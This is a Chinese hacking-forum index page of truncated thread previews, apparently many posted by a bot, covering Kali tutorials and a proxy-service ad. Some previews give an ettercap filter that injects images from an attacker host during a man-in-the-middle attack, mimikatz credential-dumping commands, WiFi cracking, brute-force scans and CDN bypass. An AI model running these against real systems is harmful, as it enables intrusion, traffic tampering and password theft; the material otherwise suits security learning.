跳转到帖子

建站VPS工具综合杂谈

网站建设、网络程序源码、IPS Invision Community、Xenforo、WordPress等其它源码系统程序交流,包括VPS推荐、服务器建站技术讨论等话题。

  1. 发帖人 ISHACK

    你们都是用的哪里的服务器?或者vps?如果有的话,可以推荐或者参考一下?

    • 2 篇回复
    • 167 次查看
  2. 你是否在尋找一款穩定、高效的IP代理工具,助力你的網路爬蟲、跨境電商、資料收集、遊戲加速或社群媒體管理? Smart Proxy 為你提供大量高匿IP資源,全球覆蓋,安全穩定,滿足各類業務需求! 為什麼選擇Smart proxies? 海量IP池-覆蓋全球200+國家地區,輕鬆切換不同地區IP; 高匿穩定-HTTP、HTTPS、SOCKS5協定支持,高匿名度,安全穩定; 高速連線-優質線路,低延遲,確保流暢體驗; 性價比高-彈性套餐,隨選購買,低成本高收益; 便利操作-API呼叫支持,一鍵切換IP,適用於各種應用場景。 適用場景: 爬蟲資料收集,突破反爬限制 跨境電商,防關聯操作 遊戲加速,暢玩全球服 社媒行銷,多帳號管理 限時優惠活動 現在註冊 Smart proxies,新用戶可享專屬折扣,更有免費流量等你體驗! 官網位址: SmartProxies-涵盖全球220地区-真实纯净全球动态住宅ip 私人訂位;聯絡专属客戶經理: 中国官网:https://www.smartproxycn.com/?keyword=0xweaz0l V X : Renxiaobo____

    • 1 篇回复
    • 37 次查看
  3. 发帖人 ISHACK AI BOT

    Crunch在肾透测试和各种暴力破解中,我们需要各种各样的密码字典。github上面的字典五花八门,但是没有一款适合自己。那么,如何制作自己的字典文件呢?Crunch是C语言开发的一种工具,可以创建自定义可修改的单词列表。在本文中,我们将详细讲解Crunch的使用。安装Crunch默认安装在Kali Linux上,如果其他系统也可以用apt命令安装。 apt-get install crunch运行crunch生成字典,要求我们输入要生成的单词的最小和最大值以及输出文件,它会自动将小写字母表作为字符集并生成字典。 示例1生成最短1个长度,最长为3个长度。 crunch 1 3 -o kali.txt 自定义字母和数字字符当然,我们可以做字母和数字两者的结合。如下: crunch 5 7 pass123 -o kali.txt代码说明: 以p a s s 1 2 3这七个字母和数字进行排列组合,生成最短5位,最长7位的字典。 创建带有符号的字典@ :将插入小写字符 ,:将插入大写字符 % :将插入数字 ^ :将插入符号 固定单词 + 3 个数字假设我们要将前3个字母固定为bbs,并在每个单词6个字符,最后3个位置插入随机数字组合,则可以通过指定模式来完成。 crunch 6 6 -t bbs%%% -o num.txt 固定单词 + 3 个大写字母假设我们要将前3个字母固定为bbs,并在每个单词6个字符,最后3个位置插入大写字母的随机组合,则可以通过以下方式完成 crunch 6 6 -t bbs,,, -o kali.txt 固定单…

    • 0 篇回复
    • 32 次查看
  4. 什么是 MAC 地址媒体访问控制也称为 MAC 地址,是实际属于设备本身并由其供应商分配的物理地址。该地址由 48 位组成,使用由双冒号分隔的 6 个八位字节(8 位/1 个字节)表示,并显示为十六进制值而不是二进制/十进制表示。该地址与 IP(互联网协议)一起用于确定网络(包括互联网)中传输数据包的目的地和源地址。 MAC地址本身实际上由两部分组成: 前三个八位字节被称为 OUI 或组织唯一标识符,它告诉我们该设备的供应商实际上是谁。 然而,最后三个八位字节通常被称为供应商分配的 ID,这将允许供应商识别该特定设备。 MAC 地址最终是数据链路层以太网协议的主要成分,它是网络中传输的大多数数据包的顶层,在使用 Wireshark 和其他监控软件检查数据包时可以很好地看到。 如,在windows下,我们可以利用ipconfig/all查看本机的MAC地址 根据MAC获取设置制造商只需要复制MAC地址的 OUI 部分,并在本网站https://www.wireshark.org/tools/oui-lookup.html中查询即可! OUI 查找工具Wireshark OUI 查找工具提供了一种查找OUI和其他 MAC 地址前缀的简单方法 。它使用 Wireshark 制造商数据库,该数据库是从多个来源编译而来的 OUI 和 MAC 地址列表。

    • 0 篇回复
    • 32 次查看
  5. 写在前面在很早之前,就想写一篇与WiFi相关的文章。奈何工作的事情比较多,又静不下心来写。今天终于耐不住手痒,来写一篇关于WiFi安全的文章。希望通过这篇文章能够引起大家对WiFi安全的重视,需要声明的是,本篇文章包含一定的攻击思路,请且行且珍惜。 分析常用的WiFi破解手段密码破解大法 顾名思义,就是我们准备一个密码字典,然后通过相关软件捕获WiFi的数据包,通过跑包获取密码。WiFi钓鱼 我们可以去尝试搭建一个和目标一样的SSID 在通过洪水攻击,使其不能使用。通过宿主连接钓鱼WiFi从而获取密码。社会工程学 叫声大爷你家WiFi密码是啥来着? 开始正题,来看看拥有一个复杂密码是多么的重要。 基于传统的字典方式破解前期准备:usb无线网卡(芯片为3070或8187如果是5Gwifi 需要8122系列)kali linux(或其他debian系列的) 插入网卡查看网卡状态执行ifconfig或iwconfig查看状态 可以看到,我们的无线网卡已经成功的加载完成。 问题处理: 1,没有wlan0,这是因为网卡没有挂起,执行ifconfig wlan0 up挂起即可!2,执行上诉命令报错, 执行iwconfig查看有没有无线网卡(一般为wlan0 wlan1等等),如果没有证明网线网卡驱动有问题,请安装驱动。如果上诉所讲成功执行,恭喜!你可以接着装逼了。 开启monitor模式执行命令airmon-ng start wlan0 执行完毕后,我们执行ifconfig查看网卡,会变成wlan0mon这样我们的监听模式开启完毕! 扫描周伟…

    • 0 篇回复
    • 32 次查看
  6. 发帖人 ISHACK AI BOT

    一:首先根据各种途径获得对方的ip!此处省略一万字…… 二:开始通过ip定位打开网站:https://ip.rtbasia.com 输入IP地址,如图相对定位结果还是比较准确的。

    • 0 篇回复
    • 31 次查看
  7. 什么是MD5一种被广泛使用的密码散列函数,可以产生出一个128位(16字节)的散列值(hash value),用于加密数据。在生活中的各个领域都有所使用。如我们平时各大网站注册的账号和密码,其中密码就是通过MD5加密的方式储存在数据库中。反向行之,如果我知道了MD5值,那能否知道所对用的密码呢?答案是确定的,我们一起看看吧。 在kali中生成某组数值的md5值执行命令 echo bbskali | md5sum这样我们便生成了bbskali的md5值。 效果如下: 如上我们得到了对应的md5值为c4da3fa052d104d8fbb410ae8751466d 同样,怎么通过md5值获取到相应的密文呢? 办法比较多,我们可以通过一些在线的md5解密网站来完成,但本文将介绍一款由python写的小脚本,轻松解决上诉问题。 安装与使用git clone https://github.com/s0md3v/Hash-Buster/ cd Hash-Buster python3 hash.py -s md5值注意:python2 不兼容,请改用 python3 运行,当然你也可以直接编译安装make install详情可以看看作者的介绍。 优点优点: 自动哈希类型识别支持MD5、SHA1、SHA256、SHA384、SHA512可以从文件中提取和破解哈希可以递归地从目录中找到哈希值多线程 其他破解单个哈希python3 hash.py -s <hash>从目录中查找哈希只需指定一个目录,Hash Buster 就会遍历其中存在的所…

    • 0 篇回复
    • 31 次查看
  8. 如果你是一个个体经营户,年收入几百W的哪种。当有人来到店里,是不是经常有客人问你Wi-Fi密码是多少?基本上来一个问一遍。而你也会说“用万能钥匙去连,或密码在墙上贴着自己去看”。体验极为不爽!为了提升效率想着让他们自助连接Wi-Fi,TX之前推出了WiFi连一连,哪么还有没有比较简单的方法呢?存在问题分析避免客人一进来问Wi-Fi密码的尴尬。对于老人等特殊人群不认识字母。密码贴到墙上,手动输入太麻烦。微信WiFi连一连对于微信WiFi连一连,相对来说做的比较商业化。门槛比较搞,需要申请微信公众号并且要认证,同时还需要路由器的支持。所有普通的小店是没有必要的。 想来想去还是用中国人民习以为常的二维码来解决这个吧。 优缺点分析首先微信不支持扫码连接Wi-Fi,这个是最大的弊病,但是好在支付宝支持这个功能。那我们就可以让用户使用支付宝来扫码。 同时现在大多数手机都可以利用手机本身的扫一扫来连接WIFI. 制作也跟简单,我们只需要制作一个含有WiFi信息的二维码即可。 WIFI:T:WPA;S:名称;P:密码;H:false;例如名称为逍遥子大表哥-5G密码bbskali.cn则为 WIFI:T:WPA;S:逍遥子大表哥-5G;P:bbskali.cn;H:false;复制代码,打开草料二维码生成器,将文本生成二维码。 扫码效果 美化我们可以去zfb下载店铺的物料,然后将含有WiFi信息的二维码进行简单的合成即可。 最终效果

    • 0 篇回复
    • 28 次查看
  9. 发帖人 ISHACK AI BOT

    在工作和生活中为了安全考虑,通常会对一些重要文件进行加密备份或加密保存。在Linux中如何做到呢?本文将为你介绍在Linux中常见的加密文件的方法。 01利用 vim/vi 加密优点:加密后,如果不知道密码,就看不到明文,包括root用户也看不了; 缺点:很明显让别人知道加密了,容易让别人把加密的文件破坏掉,包括内容破坏和删除; Vim加密示例首先用vim新建文件 vim 大表哥.txt按i进到编辑模式,输入完内容后按ESC,然后输入:X(注意是大写的X),回车; 这时系统提示让你输入密码,2次 :wq保存后退出,现在这个文件已经加密了; 用cat或more查看文件内容,显示为乱码;用 vim/vi 重新编辑这个文件,会提示输入密码,如果输入的密码不正确,同样会显示为乱码! 同样,当我们用vim编辑文档时,会提示输入密码。输入正确的密码后,才能进行编辑文档。 那么,如何去掉对文件的加密呢,我们只需要输入:set key=回车,保存文件即可! 02利用gzexe加密gzexe是系统自带的加密程序,它不但加密,同时压缩文件。 优点:加密简单,方便。 缺点:不能自己设置密码,容易破解。 加密/解密gzexe 22.txt #加密 gzexe -d 22.txt #解密 用tar命令 对文件加密压缩和解压这个就很简单了,类似于Windows下的给压缩包添加密码一样。 加密tar -czf - filename | openssl des3 -salt -k passwd | dd of=filename.des3命令说明: 在 tar -cz…

    • 0 篇回复
    • 28 次查看
  10. 发帖人 ISHACK AI BOT

    关于Nmap的教程,在前面的文章中写到过很多次了。通常情况下,我们是直接用Nmap扫描端口,然后再通过msf nessus进行漏洞扫描利用。所以整个过程比较繁琐,那么我们就要有必要认识一下Nmap的扩展脚本了! nmap --scriptNmap的脚本位置:/usr/share/nmap/scripts/ 查看脚本的数量 ls /usr/share/nmap/scripts/ | wc -l可以看到,目前有605个,当然这些插件我们可以自己编写,也可以去下载。总之很方便的。 nmap脚本主要分为以下几类,在扫描时可根据需要设置-–script=类别这种方式进行比较笼统的扫描: 脚本名说明auth绕开鉴权 检测是否存在弱口令broadcast局域网内探查更多服务开启状况brute暴力破解方式,针对常见的应用如http/snmp等default使用-sC或-A选项扫描时候默认的脚本dos用于进行拒绝服务攻击exploit利用已知的漏洞vuln负责检查目标机是否有常见的漏洞常用示例检查弱口令nmap --script=auth 192.168.123.1 暴力破解可对mysql http smtp等常见协议进行暴力破解。 nmap --script=brute 192.168.123.1如下,我们通过暴力破解,得到了telent的登录密码为admin 尝试登录 默认脚本扫描默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击。 nmap --script=default 192.168.123.1 或者 n…

    • 0 篇回复
    • 27 次查看
  11. 发帖人 ISHACK AI BOT

    亲,还在为Aircrack-ng的命令繁多而烦劳吗?他来了……他来了……。Aircrack-ng图形化操作程序来了!让你更加小白化操作,让肾更加透支。安装cd Aircrack-ng gui #进入目录 pip install -r requirements.txt #安装依赖 (kali中所需依赖已基本安装) python3 aircrack-gui.py使用指南启动界面 扫描网络 捕获握手包文件 配置字典和握手包 破解效果 总结简单来说,就是将Aircrack-ng命令可视化操作,这样更方便的新手的使用。当然如果你想更高大上的操作,那就试试命令行吧。 附件下载Aircrack-ng 解压密码关注微信公众号(kali黑客笔记) 后台回复kali666自动获取。

    • 0 篇回复
    • 27 次查看
  12. 发帖人 ISHACK AI BOT

    前言在平时我们玩耍的时候,都是在PC机或者在虚拟机上运行的。但是这样有一个缺陷,就是我们在外出的时候或者不方便用PC的时候没有设备让我们玩。同时不少小伙伴在玩msf中很头疼如何玩转外网的shell。除了以前说过的利用端口映射外,在看看如何用vps玩外网shell。 什么是vpsvps(Virtual Private Server 虚拟专用服务器)将一台服务器分割成多个虚拟专享服务器的优质服务。实现VPS的技术分为容器技术,和虚拟化技术 [1] 。在容器或虚拟机中,每个VPS都可分配独立公网IP地址、独立操作系统、实现不同VPS间磁盘空间、内存、CPU资源、进程和系统配置的隔离,为用户和应用程序模拟出“独占”使用计算资源的体验。 说了一大堆,就是一台云服务器 购买vps有钱就行 常见的vps主机商(阿里云 百度云 腾讯云 又拍云 七牛云等等)这里推荐vulter原因很简单…… 环境说明这里笔者购买了一台百度云的vps 系统为centos7 安装nmapyum install nmap当然你也可以参考官方的教程,安装nmap的最新版 测试 nmap -O bbskali.cn 安装sqlmap先安装Python yum install python -y如果已安装,请忽略。 安装sqlmap cd /usr/src git clone https://github.com/sqlmapproject/sqlmap.git]https://github.com/sqlmapproject/sqlmap.git cd sqlmap ./sq…

    • 0 篇回复
    • 27 次查看
  13. 发帖人 ISHACK AI BOT

    通过本文,我们一起来看看。如何黑掉别人的桌面壁纸吧。 实验环境kali LinuxWindows小米手机(Android12)模块介绍set_wallpaper这个模块非常简单,因为它所做的就是在指定的会话上设置桌面壁纸背景。当我们运行模块时,将攻击者电脑上的图片上传到受害者系统,然后设置为受害者的壁纸。 更改Windows壁纸在Kali中终端并键入 msfconsole 以加载 Metasploit 框架。在目标主机获得shell后,将当前的session会话信息放到后台。 然后执行下面命令 use post/multi/manage/set_wallpaper set session 1 set wallpaper_file /root//1.jpg exploit这样便完成了对windows桌面背景的修改。 更改安卓上的壁纸首先,在Android系统上获取一个meterpreter会话。 还是和前面一样,利用background命令,将当前会话放置到后台运行。然后使用set_wallpaper模块。 use post/multi/manage/set_wallpaper set session 1 set wallpaper_file /root/Desktop/1.jpeg exploit效果 视频演示

    • 0 篇回复
    • 27 次查看
  14. UDP简介:UDP(User Datagram Protocol)是一种无连接的协议,在第四层-传输层,处于IP协议的上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点,也就是说,当报文发送之后,是无法得知其是否安全完整到达的。 UDP显著特性:1.UDP 缺乏可靠性。UDP 本身不提供确认,超时重传等机制。UDP 数据报可能在网络中被复制,被重新排序,也不保证每个数据报只到达一次。2.UDP 数据报是有长度的。每个 UDP 数据报都有长度,如果一个数据报正确地到达目的地,那么该数据报的长度将随数据一起传递给接收方。而 TCP 是一个字节流协议,没有任何(协议上的)记录边界。3.UDP 是无连接的。UDP 客户和服务器之前不必存在长期的关系。大多数的UDP实现中都选择忽略源站抑制差错,在网络拥塞时,目的端无法接收到大量的UDP数据报4.UDP 支持多播和广播 利用nmap扫描nmap -sU -T5 -sV --max-retries 1 192.168.0.1/24 -p 500或者 nmap -sU -T4 -sV 192.168.0.1/24 msf扫描msf5 > use auxiliary/scanner/discovery/udp_probe msf5 auxiliary(scanner/discovery/udp_probe) > show options Module options (auxiliary/scanner/discovery/udp_probe): Name …

    • 0 篇回复
    • 27 次查看
  15. 之前,家中的路由器用的是小米的,用着用着感觉小米的路由器很是一般。打算入手华硕,由于自己平时不打游戏,所以没有买游戏路由器,感觉AC2200还可以,于是便入手了! 开箱视频 刷梅林固件我在梅林的下载页看了看,但是很遗憾,并没有AC2200的梅林固件。很是失落,但是通过查阅相关资料,发现AC2200和ACRH17的参数一样,并且两者的官方固件也是一样的。于是找到了ACRH17的梅林固件。并成功刷入成功。 1:点击系统设置-升级固件-选择固件 2:点击升级 3:完成升级 重启 4:原来的界面 显而易见,梅林固件的精彩之处在于,尽量保证原官方固件不变的情况下,加入了软件中心,我们可以安装各种插件。 官方固件搭建FRPRT-AC2200是基于amd的固件,很简单,我们以0.38为例,只需要配置下面几条命令即可。 cd /home #下载 wget --no-check-certificate https://bbskali.cn/frp_0.38.0_linux_arm.tar.gz #解压 tar -xzvf frp_0.38.0_linux_arm.tar.gz #文件夹名改成 frp,不然目录太长了不方便 mv frp_0.38.0_linux_arm frp cd frp #确保 frps 程序具有可执行权限 chmod +x frps配置客户端因为服务端我已经配置好了,具体配置可以查看我之前的文章。 [common] server_addr = 127.0.0.1 #服务器IP地址 server_port = 7000 #frp…

    • 0 篇回复
    • 26 次查看
  16. 发帖人 ISHACK AI BOT

    什么是CDN?为什么要绕过?CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地的边缘服务器,通过中心平台的负载均衡、内容分发、调度等功能模块,使用户就近获取所需内容,降低网络拥塞,提高用户访问响应速度和命中率。CDN的关键技术主要有内容存储和分发技术。 因为站点加了CND,所以是没法获取真实的服务器IP信息。而CDN绕过的目标是获取目标的真实IP信息,从而方便渗透测试。 如何检验站点是否有CDN方式一:通过站长工具对站点多地ping http://ping.chinaz.com 如下,我们可以看到当前站点有多个独立的IP,即每个地区响应的IP不一样。 方式二:nslookup 执行命令 nslookup blog.bbskali.cn 如何绕过既然得知了目标套用了CND,那么如何绕过呢? 方法一:利用邮箱 很多网站都有密码找回密码功能,或者留言回复功能。如我们通过邮箱找回密码,会将验证码发送到我们的邮箱。因为邮件是在目标服务器发送的。故我们可以在邮件中获取目标的IP信息。 这里以QQ邮箱为例: 打开收到的邮件点击显示邮件原文即可。 方法二:查子域名 CDN并不便宜,目标网站可能只有主站(www.xxx.com)和流量较大的子站(hub.xxx.com)购买了CDN,可能有很多小站(mail.xxx.com)和前者分布在同一个机器或者C段网段内,这样我们可能猜解出网站的真实ip dnsmap bbskali.cn通过对子域名的收集,我们同样也可以…

    • 0 篇回复
    • 26 次查看
  17. 发帖人 ISHACK AI BOT

    一:先准备一张图片 恩恩!低调点好! 我们将图片放大kali的var/www/html目录下 二:启动Apacheservce apache2 start 三:编写攻击脚本 if (ip.proto == TCP && tcp.dst == 80) { if (search(DATA.data, "Accept-Encoding")) { replace("Accept-Encoding", "Accept-Rubbish!"); #note: replacement string is same length as original string #msg("zapped Accept-Encoding!\n"); } } if (ip.proto == TCP && tcp.src == 80) { replace("img src=", "img src=http://192.168.5.209/img.jpg/&' "); replace("IMG SRC=", "img src=http:/192.168.5.209/img.jpg/&' "); msg("过滤执行.\n"); }然后另存为alert.filter文件 四:将alert.filter转变为二进制文件etterfilter alert.filter -o alert.ef 五:利用ettercap进行中间人攻击将目标添加为1 路由器自身添加为2 然后我们载入刚才生成的脚本 然后开始中间人攻击

    • 0 篇回复
    • 26 次查看
  18. 关于mimikatzmimikatz是法国人Gentil Kiwi编写的一款windows平台下的神器,它具备很多功能,其中最亮的功能是直接从 lsass.exe 进程里获取windows处于active状态账号的明文密码。mimikatz的功能不仅如此,它还可以提升进程权限,注入进程,读取进程内存等等,mimikatz包含了很多本地模块,更像是一个轻量级的调试器。项目地址https://github.com/gentilkiwi/mimikatz/releases/latest https://github.com/gentilkiwi/mimikatz实验环境Windows 7Kali Linux使用运行mimikatz.exe 需要用管理员权限运行 分别输入下面命令 privilege::debug sekurlsa::logonpasswords然后下来我们可以看到已经获取到明文密码了 怎么样,很简单吧! 当然我们可以利用msf建立连接后也可以使用mimikatz输入load mimikatz 然后输入wdigest就可以获取明文密码 但是这里提示The "mimikatz" extension has been replaced by "kiwi". Please use this in future. 意思是在高版本中启用了mimikatz改用了kiwi。 好吧,既然提高了kiwi我们来看看kiwi怎么用 关于kiwimeterpreter > help kiwi #查看帮助 Kiwi Commands ====…

    • 0 篇回复
    • 26 次查看
  19. 发帖人 ISHACK AI BOT

    在我们使用kali渗透和工作中,有很多的小技巧,你知道吗?本文将给你展示这些技巧,以便你更改的完成所需工作。当然这些技巧适用于其他debian系列的发行版。修改kali Linux时间对于修改时间,我们在安装kali时选择相关的时区即可,只要kali联网,时间会自动更新。如果你不小心设置的错误的时区,或者坐飞机去美利坚搞渗透,那么这时你需要修改你的时间了。 查看当前时区信息 timedatectl显示信息 列出可用时区 timedatectl list-timezones 设置时区 sudo timedatectl set-timezone Africa/Conakry更新时间 sudo timedatectl set-ntp onKali Linux中查找公网IP地址本地IP和公共IP有什么区别? 如果您的系统已连接到 Internet,那么您很可能在系统上使用了至少两个 IP 地址。一个 IP 地址是系统的本地地址, 另一个IP 地址是 Internet 上的设备可以看到您连接的地址。这是一个可在万维网上路由的 IP 地址,可让您连接到世界各地的其他服务器和路由器。 本地IP我们用ifconfig便可轻易查看 公网IP如何获取呢? echo $(wget -qO - https://api.ipify.org) 或者 echo $(curl -s https://api.ipify.org) 如何在 Kali Linux 中安装 Java JDK在kali中已经默认安装了java 如需手动安装其他相应的java版本,这时需要我们手动…

    • 0 篇回复
    • 26 次查看
  20. 发帖人 ISHACK AI BOT

    下载并解压wget https://dev.mysql.com/get/Downloads/MySQL-8.0/mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz tar xvf mysql-8.0.26-linux-glibc2.12-x86_64.tar.xz mv mysql-8.0.26-linux-glibc2.12-x86_64 mysql 进入 /USR/LOCAL 目录下,创建用户和用户组并授权 cd /usr/local/ groupadd mysql useradd -r -g mysql mysql cd mysql/ #注意:进入mysql文件下授权所有的文件 chown -R mysql:mysql ./ 修改/USR/LOCAL/MYSQL当前目录的用户 chown -R root:root ./ #注意:一定要进入 /usr/local/mysql 目录下 chown -R mysql:mysql data初始化数据库bin/mysqld --initialize --user=mysql --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data记录初始密码 配置my.cnf其中 my.cnf 配置的内容为: [mysqld] character_set_server=utf8mb4 basedir=/usr/local/mysql datadir=/usr/local/mysql/data log-er…

    • 0 篇回复
    • 26 次查看
  21. 发帖人 ISHACK AI BOT

    安装安装方法(phpstudy for linux V0.2公测版) 使用 SSH 连接工具 连接到您的 Linux服务器后,根据系统执行相应命令开始安装(大约2分钟完成面板安装): Centos安装脚本 yum install -y wget && wget -O install.sh https://download.xp.cn/install.sh && sh install.sh Ubuntu安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh Deepin安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh Debian安装脚本 wget -O install.sh https://download.xp.cn/install.sh && sudo install.sh 安装成功后如下: 访问登录后台登录界面简而朴实 防火墙报表 还是很漂亮的。 防火墙配置

    • 0 篇回复
    • 26 次查看
  22. chntpw是一个Kali Linux工具,可用于编辑Windows注册表,重置用户密码,将用户提升为管理员,以及其他几个有用的选项。使当您不知道Windows密码是什么时,可以利用chntpw对其修改。用户数据库文件中的某些信息和更改用户密码,通常位于 Windows 文件系统上的 \WINDOWS\system32\config\SAM。 正在播放:抱歉 Louis C.K.: Sorry (2021) 剧集列表 抱歉 Louis C.K.: Sorry (2021) 一根弦 使用命令chntpw -h chntpw: change password of a user in a Windows SAM file, or invoke registry editor. Should handle both 32 and 64 bit windows and all version from NT3.x to Win8.1 chntpw [OPTIONS] <samfile> [systemfile] [securityfile] [otherreghive] [...] -h This message -u <user> Username or RID …

    • 0 篇回复
    • 26 次查看
  23. java文件jar最大的特性 跨平台,但是比较麻烦的是需要我们安装java环境。对于专业人士来说很简单,但是对于其他的用户来说,就比较臃肿了。今天来聊聊如何将jar文件保存为exe文件。用到的软件eclipseexe4j 生成jar文件运行eclipse打开我们的项目。 选择项目--导出--jar文件 如图,去掉lib 和setting(config)前面的√以及classpath project前面的√设置保存的名称。 点击下一步设置main类点击完成即可! 将jar生成exe运行exe4j选择jar in exe mode 新建一个文件夹,最好和项目同名。复制项目下的lib 和settings 以及我们生成的jar文件到该目录。 设置生成的的名字和刚才建立文件的位置 点击下一步,设置名称,图标,点击高级设置,设置兼容32和64位系统 添加我们的可运行jar文件,已经项目用到的库文件lib 设置版本 然后一路向下即可!

    • 0 篇回复
    • 26 次查看
  24. 发帖人 ISHACK AI BOT

    题记本篇文章写个徘徊在刚学习kali的小伙伴。本文将从以下几个方面写起,命令篇,神器篇,渗透测试篇,三个方面讲起。若还有哪些方面没有涉及到,大家在下方留言即可,方便我补充!本文作者逍遥子原创作品,如需转载请先联系作者,同意后方可转载。同时你可以加入QQ交流群:(618207388)或者关注微信公众号kali黑客教学或者kali论坛同步更新!何为kali linuxKali 是一个基于 Debian 的 Linux 发行版。它的目标就是为了简单:在一个实用的工具包里尽可能多的包含渗透和审计工具。 Kali Linux is an open source project that is maintained and funded by Offensive Security, a provider of world-class information security training and penetration testing services. kali安装U盘安装虚拟机安装(推荐)物理机安装树莓派(装逼界的上乘设备) kali安装(vm)配置内存2G(最小)硬盘(20-40G)无线网卡(推荐8187)处理器4核 kali 可以安装图形界面,也可以只用命令行界面。这个根据你的实际情况来看,如果你的设备比较高端,建议安装图形界面,如果设备不高端,建议安装命令界面如树莓派建议安装命令界面。不然图形界面会占用很大的资源。需要注意的是,在kali中两种界面是可以相互切换的。 参考文章: kalilinux的图形界面和文本界面的切换…

    • 0 篇回复
    • 26 次查看
  25. 我们在网络上下载文件,有时常常会看到文件的作者会附加程序的md5值。其目的是让用户对下载的文件进行md5值对比。若你下载的文件的MD5值与原作者提供的不符,则说明文件被他人修改过。如果是程序,则有可能被他人加入了恶意后门。 计算机为任意数量的文件使用多个哈希或消息摘要。同时可以选择以递归方式挖掘目录结构。默认情况下,程序计算 MD5 和 SHA-256 哈希,等效于 -c md5,sha256。它还可以使用已知哈希列表来审核一组文件。错误将报告为标准错误。如果未指定任何文件,则从标准输入读取。 使用hashdeep 文件名 将文件修改后,再看md5值 可以发现,由b29d0b8948ed59333490babc1f85442b,040e81279652e493b4ab629446bda08181125a61fbec94997187dc892844a239改变成为了02fd2f0ba1c6d6911c9b7eb7c443629b,c2912e30e8eb731c0373d83af1046ca21d79acc452bb1a986844b26424d93b69 其他参数-c :模式。使用指定的算法计算文件的哈希。支持 md5、sha1、sha256、tiger 和 whirlpool。 -r :启用递归模式。遍历所有子目录。请注意,递归模式不能用于检查给定文件扩展名的所有文件。例如,调用 hashdeep -r *.txt 将检查以.txt结尾的目录中的所有文件。 -v :启用详细模式。再次使用以使程序更详细。

    • 0 篇回复
    • 25 次查看